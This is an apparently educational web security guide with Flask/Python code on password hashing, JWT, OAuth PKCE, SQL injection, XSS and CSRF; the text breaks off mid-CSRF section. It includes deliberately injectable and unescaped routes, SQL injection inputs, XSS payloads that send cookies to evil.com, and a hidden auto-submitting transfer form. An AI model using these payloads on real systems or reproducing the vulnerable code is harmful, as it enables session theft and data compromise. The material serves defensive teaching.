OAuth 2.0, JWT, OWASP Top 10, and Production Security Best Practices
This page contains intentional examples of security vulnerabilities (XSS, SQL injection, etc.) for educational purposes. All code examples showing attacks are properly escaped and will not execute. If your browser shows security warnings, this is expected - these are teaching examples of what NOT to do in production.
Safe to view: All malicious code is displayed as text within code blocks and cannot execute.
Every senior engineer must understand authentication, authorization, and common vulnerabilities. A single security flaw can compromise an entire system. This guide covers production-ready security patterns.
| Aspect | Authentication | Authorization |
|---|---|---|
| Question | Who are you? | What can you do? |
| Purpose | Verify identity | Check permissions |
| Example | Login with username/password | Can user edit this document? |
| Methods | Password, OAuth, Biometric, MFA | RBAC, ABAC, ACLs |
| Happens | First (before authorization) | Second (after authentication) |
Storing passwords in plaintext is a critical vulnerability. If your database is compromised, all user accounts are instantly exposed.
import bcrypt
import hashlib
import os
# ❌ BAD - Plaintext password storage
class BadPasswordStorage:
    """Anti-example: persists the password exactly as it was typed.

    NEVER DO THIS. Kept only to show what plaintext storage looks like.
    """

    def store_password(self, username, password):
        """Hand the raw password to ``db.save`` without hashing it."""
        # Anyone able to read the datastore can read every credential.
        # NOTE(review): `db` is not defined in this snippet; presumably a
        # storage handle provided elsewhere.
        db.save(username, password)  # Plaintext!
# ❌ BAD - Simple hashing without salt
class WeakPasswordStorage:
    """Anti-example: one unsalted SHA-256 pass over the password.

    NEVER DO THIS. Without a per-password salt, identical passwords produce
    identical digests, which makes precomputed (rainbow-table) lookups work.
    """

    def store_password(self, username, password):
        """Store the hex SHA-256 digest of ``password`` via ``db.save``."""
        raw_bytes = password.encode()
        digest = hashlib.sha256(raw_bytes)
        # NOTE(review): `db` is not defined in this snippet.
        db.save(username, digest.hexdigest())
# ✅ GOOD - Bcrypt with salt (automatic)
class SecurePasswordStorage:
    """
    Password hashing backed by bcrypt.

    Why bcrypt?
    - A fresh salt is generated for every hash (``bcrypt.gensalt``)
    - The cost factor can be raised as hardware improves
    - It is deliberately slow, which blunts brute-force attempts
    """

    def hash_password(self, password: str) -> bytes:
        """Return the bcrypt hash of ``password`` (UTF-8 encoded)."""
        # Cost factor 12; the generated salt is embedded in the returned hash.
        fresh_salt = bcrypt.gensalt(rounds=12)
        encoded = password.encode('utf-8')
        return bcrypt.hashpw(encoded, fresh_salt)

    def verify_password(self, password: str, password_hash: bytes) -> bool:
        """Return True when ``password`` matches ``password_hash``."""
        candidate = password.encode('utf-8')
        return bcrypt.checkpw(candidate, password_hash)
# ✅ GOOD - Argon2 (even better, winner of password hashing competition)
from argon2 import PasswordHasher
class Argon2PasswordStorage:
    """
    Argon2 - Modern password hashing (recommended)

    Winner of the Password Hashing Competition (2015).
    Resistant to:
    - GPU attacks
    - Side-channel attacks
    - Memory-hard (expensive to crack)
    """

    def __init__(self):
        """Create the underlying ``PasswordHasher`` with fixed cost settings."""
        self.ph = PasswordHasher(
            time_cost=2,        # Number of iterations
            memory_cost=65536,  # Memory usage (64 MB)
            parallelism=1,      # Number of threads
        )

    def hash_password(self, password: str) -> str:
        """Return the encoded Argon2 hash string for ``password``."""
        return self.ph.hash(password)

    def verify_password(self, password: str, password_hash: str) -> bool:
        """Return True if ``password`` matches ``password_hash``, else False.

        Only verification failures (wrong password, malformed hash) are
        reported as False. Anything else, such as ``KeyboardInterrupt`` or a
        programming error, propagates instead of being silently swallowed.
        """
        # Imported here so the block does not depend on a file-level import.
        from argon2.exceptions import InvalidHash, VerificationError

        try:
            self.ph.verify(password_hash, password)
        except (VerificationError, InvalidHash):
            return False
        return True
# Usage example: hash a password at registration, then verify at login.
storage = SecurePasswordStorage()
# Registration: only the hash is kept; the literal below is demo data.
password = "SuperSecret123!"
password_hash = storage.hash_password(password)
print(f"Hash: {password_hash}")
# Login: re-check the submitted password against the stored hash.
is_valid = storage.verify_password("SuperSecret123!", password_hash)
print(f"Password valid: {is_valid}") # True
is_valid = storage.verify_password("WrongPassword", password_hash)
print(f"Wrong password: {is_valid}") # False
import re
class PasswordValidator:
    """
    Validate password strength.

    Requirements enforced by ``validate_password``:
    - Minimum 12 characters
    - At least one uppercase letter, lowercase letter, digit and special char
    - Not in the common-password list
    - Does not contain the username

    NOTE(review): the original text attributed the 12-character minimum to
    NIST; confirm against SP 800-63B before citing it.
    """

    # Any ASCII punctuation character counts as "special". The previous
    # hand-picked set omitted common choices such as '-', '_', '+' and '=',
    # so otherwise strong passwords were rejected.
    _SPECIAL_CHARS = frozenset("!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~")

    def __init__(self):
        # Load common passwords (e.g., from haveibeenpwned)
        self.common_passwords = self._load_common_passwords()

    def validate_password(self, password: str, username: str = None) -> tuple[bool, list[str]]:
        """
        Check ``password`` against every rule and collect all failures.

        Args:
            password: Candidate password.
            username: Optional account name; when given and non-empty, the
                password must not contain it (case-insensitive).

        Returns:
            ``(is_valid, errors)`` where ``errors`` lists one message per
            failed rule, in the order the rules are checked.
        """
        errors = []

        # Length check
        if len(password) < 12:
            errors.append("Password must be at least 12 characters")

        # Complexity checks
        if not re.search(r'[A-Z]', password):
            errors.append("Password must contain uppercase letter")
        if not re.search(r'[a-z]', password):
            errors.append("Password must contain lowercase letter")
        if not re.search(r'\d', password):
            errors.append("Password must contain digit")
        if not any(ch in self._SPECIAL_CHARS for ch in password):
            errors.append("Password must contain special character")

        lowered = password.lower()

        # Common password check (list entries are lowercase)
        if lowered in self.common_passwords:
            errors.append("Password is too common")

        # Username similarity check
        if username and username.lower() in lowered:
            errors.append("Password cannot contain username")

        return (not errors, errors)

    def _load_common_passwords(self) -> set:
        """Return the set of disallowed passwords (lowercase)."""
        # In production, load from file or API
        return {
            'password', 'password123', '123456', 'qwerty',
            'letmein', 'welcome', 'admin', 'root',
        }
# Usage: validate a deliberately weak password and list every failed rule.
validator = PasswordValidator()
is_valid, errors = validator.validate_password("Pass123!", "john")
if not is_valid:
    print("Password errors:")
    for error in errors:
        print(f" - {error}")
A JWT consists of three Base64URL-encoded parts separated by dots: header.payload.signature
import jwt
import datetime
from typing import Dict, Optional
class JWTManager:
    """
    JWT token management for authentication.

    Use cases:
    - Stateless authentication
    - API authentication
    - Single Sign-On (SSO)

    Security considerations:
    - Use strong secret keys (256+ bits)
    - Set short expiration times
    - Implement token refresh mechanism
    - Store secrets in environment variables
    - Use HTTPS only
    """

    def __init__(self, secret_key: str, algorithm: str = 'HS256'):
        """Store the signing key, the algorithm and the token lifetimes."""
        self.secret_key = secret_key
        self.algorithm = algorithm
        self.access_token_expiry = datetime.timedelta(minutes=15)  # Short-lived
        self.refresh_token_expiry = datetime.timedelta(days=7)  # Long-lived

    @staticmethod
    def _utc_now() -> datetime.datetime:
        """Return the current time as a timezone-aware UTC datetime.

        Replaces ``datetime.utcnow()``, which is deprecated and returns a
        naive value.
        """
        return datetime.datetime.now(datetime.timezone.utc)

    def create_access_token(self, user_id: int, email: str, roles: Optional[list] = None) -> str:
        """
        Create a short-lived access token.

        The payload carries ``user_id``, ``email``, ``roles`` (empty list when
        omitted), ``exp``, ``iat`` and ``type='access'``.
        """
        # One timestamp so `exp` is exactly `iat` plus the lifetime.
        issued_at = self._utc_now()
        payload = {
            'user_id': user_id,
            'email': email,
            'roles': roles or [],
            'exp': issued_at + self.access_token_expiry,
            'iat': issued_at,  # Issued at
            'type': 'access',
        }
        return jwt.encode(payload, self.secret_key, algorithm=self.algorithm)

    def create_refresh_token(self, user_id: int) -> str:
        """
        Create a long-lived refresh token.

        The payload carries only ``user_id``, ``exp``, ``iat`` and
        ``type='refresh'``. Refresh tokens should be stored securely
        (httpOnly cookie) and be revocable (tracked in a database).
        """
        issued_at = self._utc_now()
        payload = {
            'user_id': user_id,
            'exp': issued_at + self.refresh_token_expiry,
            'iat': issued_at,
            'type': 'refresh',
        }
        return jwt.encode(payload, self.secret_key, algorithm=self.algorithm)

    def verify_token(self, token: str, token_type: str = 'access') -> Optional[Dict]:
        """
        Verify and decode a JWT.

        Returns the payload when the signature is valid, the token has not
        expired and its ``type`` claim equals ``token_type``; otherwise None.
        """
        try:
            payload = jwt.decode(
                token,
                self.secret_key,
                algorithms=[self.algorithm],
                # A token without `exp` would never expire, so reject it.
                options={'require': ['exp']},
            )
        except jwt.ExpiredSignatureError:
            print("Token expired")
            return None
        except jwt.InvalidTokenError:
            print("Invalid token")
            return None

        # Verify token type so a refresh token cannot be used as an access
        # token (and vice versa).
        if payload.get('type') != token_type:
            return None
        return payload

    def refresh_access_token(self, refresh_token: str, user_loader=None) -> Optional[str]:
        """
        Use a refresh token to get a new access token.

        Args:
            refresh_token: Token previously issued by ``create_refresh_token``.
            user_loader: Optional callable ``user_id -> mapping | None``. The
                mapping must have an ``'email'`` key and may have ``'roles'``.
                Use it to fetch the user's current data from the database.

        Returns:
            A new access token, or None when the refresh token is invalid or
            ``user_loader`` reports that the user no longer exists.

        Without ``user_loader`` the new token carries a placeholder email and
        NO roles. Previously every refreshed token was hard-coded to
        ``["user", "admin"]``, which let any refresh token escalate to admin.
        """
        payload = self.verify_token(refresh_token, token_type='refresh')
        if not payload:
            return None

        # In production, check if refresh token is revoked (DB lookup)
        # if is_token_revoked(refresh_token):
        #     return None

        user_id = payload.get('user_id')
        if user_id is None:
            return None

        if user_loader is None:
            # No user store wired in: fall back to least privilege.
            email, roles = "user@example.com", []
        else:
            user = user_loader(user_id)
            if not user:
                return None
            email = user['email']
            roles = list(user.get('roles') or [])

        return self.create_access_token(user_id=user_id, email=email, roles=roles)
# Usage example
# NOTE: the key below is a placeholder (28 ASCII characters, i.e. fewer than
# 256 bits). Load a randomly generated key from configuration instead.
jwt_manager = JWTManager(secret_key="your-secret-key-min-256-bits")
# Login - create tokens
access_token = jwt_manager.create_access_token(
    user_id=123,
    email="john@example.com",
    roles=["user", "admin"]
)
refresh_token = jwt_manager.create_refresh_token(user_id=123)
# Only a prefix is printed so complete tokens do not land in logs.
print(f"Access token: {access_token[:50]}...")
print(f"Refresh token: {refresh_token[:50]}...")
# API request - verify access token
payload = jwt_manager.verify_token(access_token)
if payload:
    print(f"Authenticated user: {payload['email']}")
    print(f"Roles: {payload['roles']}")
# Access token expired - use refresh token
new_access_token = jwt_manager.refresh_access_token(refresh_token)
if new_access_token:
    print("New access token issued")
| Flow | Use Case | Tokens | Security |
|---|---|---|---|
| Authorization Code | Web apps with backend | Access + Refresh | Most secure (with PKCE) |
| Client Credentials | Machine-to-machine (M2M) | Access only | Secure (no user context) |
| Implicit | ❌ Deprecated (SPAs) | Access only | Insecure (token in URL) |
| Password | ❌ Deprecated (legacy) | Access + Refresh | Low (shares password) |
| Auth Code + PKCE | SPAs, Mobile apps | Access + Refresh | Secure (modern standard) |
from flask import Flask, request, redirect, session, url_for
import requests
import secrets
import hashlib
import base64
app = Flask(__name__)
# A fresh random key is generated on every start, so sessions signed by a
# previous process (or by another worker) will not validate.
# NOTE(review): load a stable secret from configuration for real deployments.
app.secret_key = secrets.token_hex(32)
class OAuth2Client:
    """
    OAuth 2.0 Authorization Code Flow with PKCE.

    Flow:
    1. Generate code verifier & challenge (PKCE)
    2. Redirect user to authorization server
    3. User authenticates and approves
    4. Receive authorization code
    5. Exchange code for access token (with verifier)
    6. Use access token to access resources

    PKCE (Proof Key for Code Exchange):
    - Prevents authorization code interception
    - Required for public clients (SPAs, mobile)
    - Recommended for all OAuth clients
    """

    # Seconds to wait for the token endpoint. Without a timeout a stalled
    # provider would block the calling request indefinitely.
    request_timeout = 10

    def __init__(self, client_id: str, client_secret: str,
                 auth_url: str, token_url: str, redirect_uri: str):
        self.client_id = client_id
        self.client_secret = client_secret
        self.auth_url = auth_url
        self.token_url = token_url
        self.redirect_uri = redirect_uri

    def generate_pkce_pair(self) -> tuple[str, str]:
        """
        Generate a PKCE ``(code_verifier, code_challenge)`` pair.

        Verifier: URL-safe base64 of 32 random bytes, padding stripped
        (43 characters).
        Challenge: URL-safe base64 of SHA-256(verifier), padding stripped.
        """
        code_verifier = base64.urlsafe_b64encode(
            secrets.token_bytes(32)
        ).decode('utf-8').rstrip('=')

        digest = hashlib.sha256(code_verifier.encode('utf-8')).digest()
        code_challenge = base64.urlsafe_b64encode(digest).decode('utf-8').rstrip('=')
        return code_verifier, code_challenge

    def get_authorization_url(self, state: str, code_challenge: str) -> str:
        """
        Build the authorization URL the user is redirected to.

        Query parameters:
        - response_type: 'code' for authorization code flow
        - client_id: Your application's ID
        - redirect_uri: Where to send user after auth
        - scope: Permissions requested
        - state: CSRF protection token
        - code_challenge: PKCE challenge
        - code_challenge_method: 'S256' (SHA256)

        Every value is percent-encoded. The scope contains spaces and the
        redirect URI contains reserved characters, so plain string joining
        yields an invalid URL and lets a crafted ``state`` inject parameters.
        """
        from urllib.parse import urlencode

        params = {
            'response_type': 'code',
            'client_id': self.client_id,
            'redirect_uri': self.redirect_uri,
            'scope': 'openid profile email',
            'state': state,
            'code_challenge': code_challenge,
            'code_challenge_method': 'S256',
        }
        # Append to an existing query string if auth_url already has one.
        separator = '&' if '?' in self.auth_url else '?'
        return f"{self.auth_url}{separator}{urlencode(params)}"

    def _post_to_token_endpoint(self, data: dict, failure_label: str) -> dict:
        """POST ``data`` to the token endpoint and return the parsed JSON.

        The client authenticates with HTTP Basic auth (client id and secret).
        Raises ``Exception`` with ``failure_label`` and the response body when
        the status is not 200.
        """
        response = requests.post(
            self.token_url,
            data=data,
            headers={'Content-Type': 'application/x-www-form-urlencoded'},
            auth=(self.client_id, self.client_secret),
            timeout=self.request_timeout,
        )
        if response.status_code == 200:
            return response.json()
        raise Exception(f"{failure_label}: {response.text}")

    def exchange_code_for_token(self, code: str, code_verifier: str) -> dict:
        """
        Exchange an authorization code for tokens.

        POSTs to the token endpoint with:
        - grant_type: 'authorization_code'
        - code: Authorization code received
        - redirect_uri: Must match original
        - client_id: Your application ID
        - code_verifier: PKCE verifier

        Raises:
            Exception: the token endpoint answered with a non-200 status.
        """
        data = {
            'grant_type': 'authorization_code',
            'code': code,
            'redirect_uri': self.redirect_uri,
            'client_id': self.client_id,
            'code_verifier': code_verifier,
        }
        return self._post_to_token_endpoint(data, "Token exchange failed")

    def refresh_access_token(self, refresh_token: str) -> dict:
        """
        Use a refresh token to get a new access token.

        Raises:
            Exception: the token endpoint answered with a non-200 status.
        """
        data = {
            'grant_type': 'refresh_token',
            'refresh_token': refresh_token,
            'client_id': self.client_id,
        }
        return self._post_to_token_endpoint(data, "Token refresh failed")
# Flask routes implementing OAuth flow
# The credentials and URLs below are placeholders for illustration.
# NOTE(review): load the client secret from configuration rather than source,
# and use an https redirect URI outside local development.
oauth_client = OAuth2Client(
    client_id="your-client-id",
    client_secret="your-client-secret",
    auth_url="https://provider.com/oauth/authorize",
    token_url="https://provider.com/oauth/token",
    redirect_uri="http://localhost:5000/callback"
)
@app.route('/login')
def login():
    """
    Start the OAuth flow: create PKCE and state values, remember them in the
    session, and redirect the browser to the authorization server.
    """
    # PKCE: the verifier stays with us; only the challenge is sent out.
    verifier, challenge = oauth_client.generate_pkce_pair()

    # Random state value, checked again in the callback (CSRF protection).
    csrf_state = secrets.token_hex(16)

    # NOTE(review): Flask's default session is a signed cookie held by the
    # browser; confirm a server-side session backend if these values must
    # stay on the server.
    session['code_verifier'] = verifier
    session['oauth_state'] = csrf_state

    target = oauth_client.get_authorization_url(csrf_state, challenge)
    return redirect(target)
@app.route('/callback')
def callback():
    """
    Handle the OAuth callback: validate ``state``, exchange the authorization
    code for tokens and store them in the session.

    Returns 400 for a missing or mismatched state or a missing code, and 500
    when the token exchange fails.
    """
    from html import escape as html_escape

    # Pop the one-time values up front so a state or verifier can never be
    # replayed, whether or not this attempt succeeds.
    expected_state = session.pop('oauth_state', None)
    code_verifier = session.pop('code_verifier', None)

    # Verify state (CSRF protection). Both values must be present: comparing
    # two missing values (None != None) would otherwise pass the check.
    state = request.args.get('state')
    if not state or not expected_state or not secrets.compare_digest(
        state.encode('utf-8'), expected_state.encode('utf-8')
    ):
        return "Invalid state parameter", 400

    # Get authorization code
    code = request.args.get('code')
    if not code:
        # `error` is attacker-controlled query input; escape it before it is
        # placed in the HTML response.
        error = request.args.get('error') or 'unknown_error'
        return f"Authorization failed: {html_escape(error)}", 400

    if not code_verifier:
        # No PKCE verifier means the flow was not started by /login here.
        return "Invalid state parameter", 400

    # Exchange code for token
    try:
        token_response = oauth_client.exchange_code_for_token(code, code_verifier)
        access_token = token_response['access_token']
    except Exception:
        # Log details server-side; do not echo provider responses to the user.
        app.logger.exception("OAuth token exchange failed")
        return "Token exchange failed", 500

    session['access_token'] = access_token
    session['refresh_token'] = token_response.get('refresh_token')
    return "Login successful!"
@app.route('/api/protected')
def protected_resource():
    """
    Call the provider's user API with the session's access token.

    On a 401 from the provider, tries one refresh with the stored refresh
    token and retries the call. Returns 401 when there is no usable token.
    """
    access_token = session.get('access_token')
    if not access_token:
        return "Unauthorized", 401

    api_url = 'https://api.provider.com/user'
    timeout_seconds = 10  # never wait on the provider indefinitely

    response = requests.get(
        api_url,
        headers={'Authorization': f'Bearer {access_token}'},
        timeout=timeout_seconds,
    )

    if response.status_code == 401:
        # Token expired, try refresh
        refresh_token = session.get('refresh_token')
        if refresh_token:
            try:
                new_tokens = oauth_client.refresh_access_token(refresh_token)
                access_token = new_tokens['access_token']
            except Exception:
                return "Session expired, please login again", 401

            session['access_token'] = access_token
            # Keep a rotated refresh token if the provider issued one.
            if new_tokens.get('refresh_token'):
                session['refresh_token'] = new_tokens['refresh_token']

            # Retry request
            response = requests.get(
                api_url,
                headers={'Authorization': f'Bearer {access_token}'},
                timeout=timeout_seconds,
            )

    if response.status_code == 401:
        # Still unauthorized: do not present the provider's error as success.
        return "Session expired, please login again", 401

    return response.json()
| Feature | OAuth 2.0 | OpenID Connect (OIDC) |
|---|---|---|
| Purpose | Authorization | Authentication + Authorization |
| Use Case | API access delegation | User login (SSO) |
| Tokens | Access token (opaque) | Access + ID token (JWT) |
| User Info | Not standardized | Standard claims in ID token |
| Examples | GitHub API access | Google Sign-In, "Login with Facebook" |
OIDC adds an ID token (JWT) that contains user identity information (name, email, etc.). The ID token is for the client, the access token is for the API.
Risk: Attackers can execute arbitrary SQL commands, read/modify/delete data, or gain admin access.
import sqlite3
import psycopg2
from typing import Optional
# ❌ VULNERABLE - SQL Injection
class VulnerableUserDB:
    """Anti-example: SQL built by pasting user input into the query text.

    NEVER DO THIS. Both methods are intentionally injectable. ``self.conn``
    must be set by the caller; this class defines no constructor.
    """

    def get_user(self, username: str) -> Optional[dict]:
        """Return the first row whose username matches (injectable)."""
        # VULNERABLE: "admin' OR '1'='1" changes the WHERE clause itself.
        sql = "SELECT * FROM users WHERE username = '{}'".format(username)
        return self.conn.execute(sql).fetchone()

    def login(self, username: str, password: str) -> bool:
        """Return True if a matching row exists (injectable)."""
        # VULNERABLE: username="admin' --" comments out the password check.
        sql = (
            "\nSELECT * FROM users\n"
            "WHERE username = '{}' AND password = '{}'\n"
        ).format(username, password)
        row = self.conn.execute(sql).fetchone()
        return row is not None
# ✅ SECURE - Parameterized queries
class SecureUserDB:
    """
    SQLite access that always binds user input as parameters.

    The driver receives the values separately from the SQL text, so input can
    never change the structure of the statement.
    """

    def __init__(self, db_path: str):
        """Open a SQLite connection to ``db_path``."""
        self.conn = sqlite3.connect(db_path)

    def get_user(self, username: str) -> Optional[dict]:
        """Return the first row for ``username`` or None."""
        bound = (username,)
        return self.conn.execute(
            "SELECT * FROM users WHERE username = ?", bound
        ).fetchone()

    def login(self, username: str, password_hash: str) -> bool:
        """Return True if a row matches both username and password_hash."""
        sql = (
            "\nSELECT * FROM users\n"
            "WHERE username = ? AND password_hash = ?\n"
        )
        match = self.conn.execute(sql, (username, password_hash)).fetchone()
        return match is not None

    def search_users(self, search_term: str) -> list:
        """Return all rows whose ``name`` contains ``search_term``."""
        # The wildcards are part of the bound value, not of the SQL text.
        pattern = f'%{search_term}%'
        rows = self.conn.execute(
            "SELECT * FROM users WHERE name LIKE ?", (pattern,)
        )
        return rows.fetchall()
# ✅ SECURE - ORM (SQLAlchemy)
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
# Declarative base class shared by the ORM models below.
Base = declarative_base()


class User(Base):
    """ORM model mapped to the ``users`` table."""

    __tablename__ = 'users'

    id = Column(Integer, primary_key=True)
    username = Column(String, unique=True)  # unique login name
    password_hash = Column(String)  # stores a hash, never the raw password
class SecureUserORM:
    """
    User lookups through the SQLAlchemy ORM.

    Filter values are passed as expression operands, so the ORM binds them as
    parameters instead of splicing them into SQL text.
    """

    def __init__(self, db_url: str):
        """Create an engine for ``db_url`` and open one session on it."""
        session_factory = sessionmaker(bind=create_engine(db_url))
        self.session = session_factory()

    def get_user(self, username: str) -> Optional[User]:
        """Return the first ``User`` with this username, or None."""
        matching = self.session.query(User).filter(User.username == username)
        return matching.first()

    def search_users(self, search_term: str) -> list:
        """Return every ``User`` whose username contains ``search_term``."""
        pattern = f'%{search_term}%'
        matching = self.session.query(User).filter(User.username.like(pattern))
        return matching.all()
# Demonstrating the vulnerability: print the walkthrough line by line.
for line in (
    "=== SQL Injection Example ===",
    "Malicious input: admin' OR '1'='1",
    "Resulting query: SELECT * FROM users WHERE username = 'admin' OR '1'='1'",
    "Effect: Returns all users (bypasses authentication)",
):
    print(line)
Risk: Attackers inject malicious scripts that execute in victims' browsers, stealing cookies, session tokens, or performing actions as the user.
from flask import Flask, render_template_string, request, escape
from markupsafe import Markup
import bleach
# Creates a new Flask application and rebinds `app` for the XSS examples.
# NOTE(review): if these snippets run as one module, routes registered on an
# earlier `app` object are not part of this one.
app = Flask(__name__)
# ❌ VULNERABLE - Reflected XSS
@app.route('/search_bad')
def search_bad():
    """Anti-example (reflected XSS): echoes ``q`` into HTML unescaped.

    NEVER DO THIS. A request such as
    /search?q=<script>alert('XSS')</script> makes the browser run the script.
    """
    user_query = request.args.get('q', '')
    # VULNERABLE: raw user input goes straight into the markup.
    return "<h1>Search results for: {}</h1>".format(user_query)
# ❌ VULNERABLE - Stored XSS
@app.route('/comment_bad', methods=['POST'])
def comment_bad():
    """Anti-example (stored XSS): saves the comment without sanitizing it.

    NEVER DO THIS. A comment such as
    "<script>document.location='http://evil.com?cookie='+document.cookie</script>"
    is stored as-is and runs later if rendered as f"<div>{comment}</div>".

    NOTE(review): this view returns no response value; presumably truncated
    for illustration.
    """
    raw_comment = request.form.get('comment')
    # VULNERABLE: the XSS payload is persisted verbatim.
    # NOTE(review): `db` is not defined in this snippet.
    db.save_comment(raw_comment)
# ✅ SECURE - Auto-escaping with Jinja2
@app.route('/search_safe')
def search_safe():
    """Render the search term through a Jinja2 template.

    The value is passed as a template variable rather than concatenated, so
    Jinja2's HTML auto-escaping applies to it.
    """
    page = "\nSearch results for: {{ query }}\n"
    user_query = request.args.get('q', '')
    return render_template_string(page, query=user_query)
# ✅ SECURE - Manual escaping
@app.route('/search_escape')
def search_escape():
    """Safe: explicitly HTML-escape the search term before embedding it.

    The original f-string was split across two lines (a syntax error) and its
    markup was lost. The heading is restored to mirror ``search_bad``, so the
    only difference between the two views is the escaping.
    """
    # `flask.escape` is no longer exported by current Flask releases;
    # markupsafe provides the same function.
    from markupsafe import escape

    query = request.args.get('q', '')
    # Escape HTML special characters (<, >, &, quotes)
    safe_query = escape(query)
    return f"<h1>Search results for: {safe_query}</h1>"
# ✅ SECURE - Sanitizing HTML input (for rich text)
class HTMLSanitizer:
    """
    Sanitize HTML input when some HTML must be allowed.

    Use case: blog comments, rich text editors.
    Strategy: allow-list of tags and attributes; everything else is removed.
    """

    # Link schemes accepted by `_validate_url`.
    _ALLOWED_SCHEMES = ('http://', 'https://', 'mailto:')

    def __init__(self):
        # Allowed tags
        self.allowed_tags = [
            'p', 'br', 'strong', 'em', 'u', 'a', 'ul', 'ol', 'li',
            'h1', 'h2', 'h3', 'blockquote', 'code', 'pre',
        ]
        # Allowed attributes per tag
        self.allowed_attributes = {
            'a': ['href', 'title'],
            '*': ['class'],  # Allow class on all tags
        }

    def sanitize(self, html_input: str) -> str:
        """
        Return ``html_input`` reduced to the allowed tags and attributes.

        Steps:
        1. ``bleach.clean`` strips every tag and attribute not on the
           allow-lists.
        2. ``bleach.linkify`` runs ``_validate_url`` on each link and drops
           links whose target is not http(s) or mailto.

        Empty or missing input yields an empty string.
        """
        if not html_input:
            return ''

        clean_html = bleach.clean(
            html_input,
            tags=self.allowed_tags,
            attributes=self.allowed_attributes,
            strip=True,  # Remove disallowed tags
        )
        # Also validate URLs in links
        return bleach.linkify(clean_html, callbacks=[self._validate_url])

    def _validate_url(self, attrs, new=False):
        """Linkify callback: keep a link only if it uses an allowed scheme.

        bleach passes ``attrs`` keyed by ``(namespace, name)`` tuples, so the
        target lives under ``(None, 'href')``. Reading ``attrs['href']`` never
        matched, which caused every link to be removed. The plain ``'href'``
        key is still honoured as a fallback.

        Returns ``attrs`` to keep the link, or None to remove it.
        """
        href = attrs.get((None, 'href'), attrs.get('href', '')) or ''
        # Browsers ignore case and leading whitespace in the scheme, so
        # normalise before checking (" JavaScript:" must not slip through).
        normalized = href.strip().lower()
        if normalized.startswith(self._ALLOWED_SCHEMES):
            return attrs
        return None
@app.route('/comment_safe', methods=['POST'])
def comment_safe():
    """Safe: sanitize the submitted HTML before storing it.

    Returns 400 when the ``comment`` form field is missing or empty, instead
    of passing None to the sanitizer and crashing.
    """
    comment = request.form.get('comment')
    if not comment:
        return "Comment is required", 400

    safe_comment = HTMLSanitizer().sanitize(comment)

    # Store sanitized comment
    # NOTE(review): `db` is not defined in this snippet.
    db.save_comment(safe_comment)
    return "Comment saved"
# Content Security Policy (CSP) header
@app.after_request
def add_security_headers(response):
    """
    Add XSS-related security headers to every response.

    Content-Security-Policy:
    - Defines which sources the browser may load resources from
    - ``script-src`` has no 'unsafe-inline', so inline scripts are blocked
    """
    response.headers['Content-Security-Policy'] = (
        "default-src 'self'; "
        "script-src 'self' https://trusted-cdn.com; "
        "style-src 'self' 'unsafe-inline'; "
        "img-src 'self' data: https:; "
        "font-src 'self'; "
        "connect-src 'self'; "
        "frame-ancestors 'none'"
    )
    # Prevent MIME type sniffing
    response.headers['X-Content-Type-Options'] = 'nosniff'
    # Explicitly disable the legacy browser XSS auditor. The header is
    # deprecated and "1; mode=block" can itself introduce vulnerabilities in
    # older browsers; the CSP above is the actual defence.
    response.headers['X-XSS-Protection'] = '0'
    return response
# Example attacks and defenses: the payloads are only printed as text.
for line in (
    "=== XSS Attack Examples ===",
    "Reflected XSS: /search?q=<script>alert('XSS')</script>",
    "Stored XSS: <script>fetch('http://evil.com?cookie='+document.cookie)</script>",
    "DOM XSS: document.write(location.hash)",
):
    print(line)
Risk: Attackers trick authenticated users into performing unwanted actions (delete account, transfer money, change email).
from flask import Flask, request, session, render_template_string
import secrets
import hmac
import hashlib
# New Flask application for the CSRF examples (rebinds `app`).
app = Flask(__name__)
# A random key per process start: existing session cookies stop validating
# after a restart. NOTE(review): use a stable configured secret in production.
app.secret_key = secrets.token_hex(32)
# ❌ VULNERABLE - No CSRF protection
@app.route('/transfer_bad', methods=['POST'])
def transfer_money_bad():
    """
    Anti-example: a state-changing POST with no CSRF token check.

    Attack scenario:
    1. User logs into bank.com
    2. User visits evil.com (attacker's site)
    3. evil.com has hidden form:
       <form action="https://bank.com/transfer" method="POST">
       <input name="to" value="attacker_account">
       <input name="amount" value="1000">
       </form>
       <script>document.forms[0].submit()</script>
    4. Form submits with user's cookies (authenticated session)
    5. Money transferred without user's knowledge
    """
    form = request.form
    to_account, amount = form.get('to'), form.get('amount')
    # VULNERABLE: any POST is processed, whatever site it came from.
    # NOTE(review): `process_transfer` is not defined in this snippet.
    process_transfer(to_account, amount)
    return "Transfer complete"
# ✅ SECURE - CSRF token protection
class CSRFProtection:
    """
    CSRF protection using synchronizer tokens.

    How it works:
    1. Generate random token on form load
    2. Store token in session
    3. Include token in form as hidden field
    4. Verify token on form submission
    5. Reject if token missing or doesn't match

    Why it works:
    - Attacker can't read token (same-origin policy)
    - Attacker can't guess token (cryptographically random)
    - Token tied to user's session
    """

    @staticmethod
    def generate_token() -> str:
        """Create a random token, store it in the session and return it."""
        token = secrets.token_hex(32)
        session['csrf_token'] = token
        return token

    @staticmethod
    def validate_token(token: str) -> bool:
        """Return True if ``token`` equals the token stored in the session.

        A missing session token or a missing submitted token yields False.
        """
        session_token = session.get('csrf_token')
        if not session_token or not token:
            return False
        # Constant-time comparison prevents timing attacks. Compare bytes:
        # compare_digest raises TypeError for str values with non-ASCII
        # characters, which would turn a forged token into a 500 error
        # instead of a clean rejection.
        return hmac.compare_digest(
            session_token.encode('utf-8'), token.encode('utf-8')
        )
@app.route('/transfer_form')
def transfer_form():
    """Display the transfer form with an embedded CSRF token.

    The original template was empty, so the token was generated but never
    sent to the browser. The form below posts the fields that the
    ``/transfer`` view reads: ``csrf_token``, ``to`` and ``amount``.
    """
    csrf_token = CSRFProtection.generate_token()
    template = """
<form method="POST" action="/transfer">
  <input type="hidden" name="csrf_token" value="{{ csrf_token }}">
  <label>To: <input type="text" name="to"></label>
  <label>Amount: <input type="number" name="amount"></label>
  <button type="submit">Transfer</button>
</form>
"""
    return render_template_string(template, csrf_token=csrf_token)
@app.route('/transfer', methods=['POST'])
def transfer_money():
    """Process a transfer only when the submitted CSRF token is valid.

    Responds with 403 when the token is missing or does not match.
    """
    submitted_token = request.form.get('csrf_token')
    if CSRFProtection.validate_token(submitted_token):
        # NOTE(review): `process_transfer` is not defined in this snippet.
        process_transfer(request.form.get('to'), request.form.get('amount'))
        return "Transfer complete"
    return "CSRF token validation failed", 403
# ✅ SECURE - Double Submit Cookie pattern
class DoubleSubmitCSRF:
    """
    Alternative CSRF protection: Double Submit Cookie.

    How it works:
